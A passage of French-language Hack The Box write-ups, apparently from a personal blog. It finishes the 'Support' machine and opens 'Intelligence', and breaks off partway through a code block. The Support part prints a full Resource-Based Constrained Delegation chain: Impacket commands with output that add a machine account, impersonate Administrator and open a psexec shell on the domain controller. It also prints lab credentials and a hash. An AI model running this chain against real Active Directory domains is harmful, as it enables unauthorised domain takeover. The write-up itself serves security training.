<strong>chatBot</strong> autorisé donc il faut prioriser la seconde méthode, à moins que vous ayez un très bon décompilateur de code <strong>.NET</strong>.</p> <h3 id="rusthound--bloodhound--support-account">Rusthound / Bloodhound : &ldquo;support&rdquo; account </h3><p>On execute <strong>rusthound</strong> afin d&rsquo;extraire les informations du compte <strong>ldap</strong>, puis on fait une analyse sur bloodhound. On trouve le compte <strong>support</strong> qui semble être très intéressant car il existe une route permettant à cet utilisateur de prendre la main sur le <strong>DC</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ rusthound -d support.htb -u <span class="s2">&#34;ldap&#34;</span>@<span class="s2">&#34;support.htb&#34;</span> -p <span class="s1">&#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz&#39;</span> -o /workspace/Support/bloodhound_data --zip -n 10.10.11.174 </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl">Initializing RustHound at 23:06:53 on 09/09/25 </span></span><span class="line"><span class="cl">Powered by g0h4n from OpenCyber </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound<span class="o">]</span> Verbosity level: Info </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound::ldap<span class="o">]</span> Connected to SUPPORT.HTB Active Directory! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound::ldap<span class="o">]</span> Starting data collection... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::ldap<span class="o">]</span> All data collected <span class="k">for</span> NamingContext <span class="nv">DC</span><span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser<span class="o">]</span> Starting the LDAP objects parsing... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser::bh_41<span class="o">]</span> MachineAccountQuota: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser<span class="o">]</span> Parsing LDAP objects finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::checker<span class="o">]</span> Starting checker to replace some values... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::checker<span class="o">]</span> Checking and replacing some values finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> users parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">61</span> groups parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> computers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> ous parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> domains parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> gpos parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> containers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> /workspace/Support/bloodhound_data/20250909230654_support-htb_rusthound.zip created! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RustHound Enumeration Completed at 23:06:54 on 09/09/25! Happy Graphing! </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://leopoldabgn.github.io/writeups/p/support-htb/image-1.png" width="788" height="415" srcset="https://leopoldabgn.github.io/writeups/p/support-htb/image-1_hu_1817b7955d20e3e3.png 480w, https://leopoldabgn.github.io/writeups/p/support-htb/image-1_hu_5ada8719d0f0d65.png 1024w" loading="lazy" alt="Support account can generic all on DC" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" ></p> <p>On remarque que le compte <strong>support</strong> fait parti du groupe <strong>SHARED SUPPORT ACCOUNTS</strong>, qui a le droit <strong>GENERIC ALL</strong> sur le DC.</p> <p>Cependant, on ne trouve a aucun moyen de récupérer le compte <strong>support</strong>.</p> <h3 id="ldapsearch--supports-password">ldapsearch : support&rsquo;s password </h3><p>En analysant les données de l&rsquo;Active Directory directement avec <strong>ldapsearch</strong>, on observe un champs <strong>&ldquo;info&rdquo;</strong> qu&rsquo;on ne pouvait pas voir sur bloodhound. Il contient&hellip; le mot de passe de l&rsquo;utilisateur <strong>support</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ldapsearch -x -H ldap://10.10.11.174 -D <span class="s2">&#34;support\ldap&#34;</span> -w <span class="s1">&#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz&#39;</span> -b <span class="s2">&#34;DC=support,DC=htb&#34;</span> <span class="p">|</span> grep -i <span class="s2">&#34;sAMAccountName.*support&#34;</span> -A10 -B25 </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>support,CN<span class="o">=</span>Users,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">instanceType: <span class="m">4</span> </span></span><span class="line"><span class="cl">whenCreated: 20220528111200.0Z </span></span><span class="line"><span class="cl">whenChanged: 20220528111201.0Z </span></span><span class="line"><span class="cl">uSNCreated: <span class="m">12617</span> </span></span><span class="line"><span class="cl">info: Ironside47pleasure40Watchful <span class="c1"># &lt;&lt;&lt;&lt;&lt;-------- HERE</span> </span></span><span class="line"><span class="cl">memberOf: <span class="nv">CN</span><span class="o">=</span>Shared Support Accounts,CN<span class="o">=</span>Users,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">memberOf: <span class="nv">CN</span><span class="o">=</span>Remote Management Users,CN<span class="o">=</span>Builtin,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">uSNChanged: <span class="m">12630</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">lastLogon: <span class="m">0</span> </span></span><span class="line"><span class="cl">pwdLastSet: <span class="m">132982099209777070</span> </span></span><span class="line"><span class="cl">primaryGroupID: <span class="m">513</span> </span></span><span class="line"><span class="cl">objectSid:: <span class="nv">AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl">accountExpires: <span class="m">9223372036854775807</span> </span></span><span class="line"><span class="cl">logonCount: <span class="m">0</span> </span></span><span class="line"><span class="cl">sAMAccountName: support </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="generic-all-on-dc--resource-based-constrained-delegation-attack">Generic All on DC : Resource-Based Constrained Delegation Attack </h3><p>Nous avons observé auparavant que <strong>support</strong> appartient à un groupe ayant le droite &ldquo;GENERIC ALL&rdquo; sur le DC.<br> Il faut alors exploiter une <strong>Resource-Based Constrained Delegation</strong> Attack.</p> <p>En utilisant les conseils donnés par <strong>bloodhound</strong>, voici un exemple d&rsquo;exploitation :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket&#39;s addcomputer.py example script:</span> </span></span><span class="line"><span class="cl">$ addcomputer.py -computer-name <span class="s1">&#39;HACKED$&#39;</span> -computer-pass <span class="s1">&#39;hacked123!&#39;</span> -dc-host DC.SUPPORT.HTB -domain-netbios support.htb support.htb/<span class="s1">&#39;support&#39;</span>:<span class="s1">&#39;Ironside47pleasure40Watchful&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully added machine account HACKED$ with password hacked123!. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># We now need to configure the target object so that the attacker-controlled computer can delegate to it. Impacket&#39;s rbcd.py script can be used for that purpose:</span> </span></span><span class="line"><span class="cl">$ rbcd.py -delegate-from <span class="s2">&#34;HACKED</span>$<span class="s2">&#34;</span> -delegate-to <span class="s1">&#39;DC$&#39;</span> -dc-ip <span class="s2">&#34;10.10.11.174&#34;</span> -action write <span class="s2">&#34;support.htb&#34;</span>/<span class="s2">&#34;support&#34;</span>:<span class="s1">&#39;Ironside47pleasure40Watchful&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Delegation rights modified successfully! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> HACKED$ can now impersonate users on DC$ via S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Accounts allowed to act on behalf of other identity: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> HACKED$ <span class="o">(</span>S-1-5-21-1677581083-3380853377-188903654-5601<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># And finally we can get a service ticket for the service name (sname) we want to &#34;pretend&#34; to be &#34;admin&#34; for. Impacket&#39;s getST.py example script can be used for that purpose.</span> </span></span><span class="line"><span class="cl">$ getST.py -spn CIFS/dc.support.htb -impersonate Administrator -dc-ip <span class="s2">&#34;10.10.11.174&#34;</span> <span class="s2">&#34;support.htb&#34;</span>/<span class="s1">&#39;HACKED$&#39;</span>:<span class="s1">&#39;hacked123!&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> CCache file is not found. Skipping... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Impersonating Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2self </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ mv Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache admin.ccache </span></span><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;admin.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># This ticket can then be used with Pass-the-Ticket, and could grant access to the file system of the TARGETCOMPUTER.</span> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass support.htb/Administrator@dc.support.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file phZHHPqE.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service YbSC on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service YbSC..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.20348.859<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\s</span>upport<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">1e30.....0c23 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">a848.....12cf </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><p>Je n&rsquo;ai pas trouvé le mot de passe de l&rsquo;utilisateur <strong>support</strong> avec <strong>ldapsearch</strong>.</p> <p>Conseil: Après de longues recherches sur <strong>bloodhound</strong>, si on trouve un compte et/ou un groupe intéressant, toujours les analyser avec <strong>ldapsearch</strong> après, pour vérifier qu&rsquo;il n&rsquo;y pas d&rsquo;infos supplémentaires tel qu&rsquo;un mot de passe dans une variable de description par exemple.</p>https://leopoldabgn.github.io/writeups/p/intelligence-htb/Wed, 03 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/intelligence-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Intelligence cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Intelligence</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.248</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Tiffany.Molina : NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">Ted.Graves : Mr.Teddy </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.248 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-03 19:34:02Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49666/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49691/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49692/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49710/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49713/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="intelligencehtb">intelligence.htb </h3><p>On découvre un site web sur le port 80 de notre machine.</p> <h3 id="fuzzing-files">Fuzzing files </h3><p>Sur la page d&rsquo;accueil on nous indique un lien vers un fichier :</p> <blockquote> <p><a class="link" href="http://intelligence.htb/documents/2020-01-01-upload.pdf" target="_blank" rel="noopener" >http://intelligence.htb/documents/2020-01-01-upload.pdf</a> Un deuxième lien est présent avec un fichier contenant une autre date.</p> </blockquote> <p>On fait la déduction que d&rsquo;autres files peuvent etre présents, si l&rsquo;on réussi à faire du <strong>fuzzing</strong> avec la date.</p> <p>Dans un premier temps, on génére donc un fichier Python qui parcourt toutes les dates dans le bon format de 2015 à 2022 pour un premier test. On redirige ensuite la liste dans un fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span 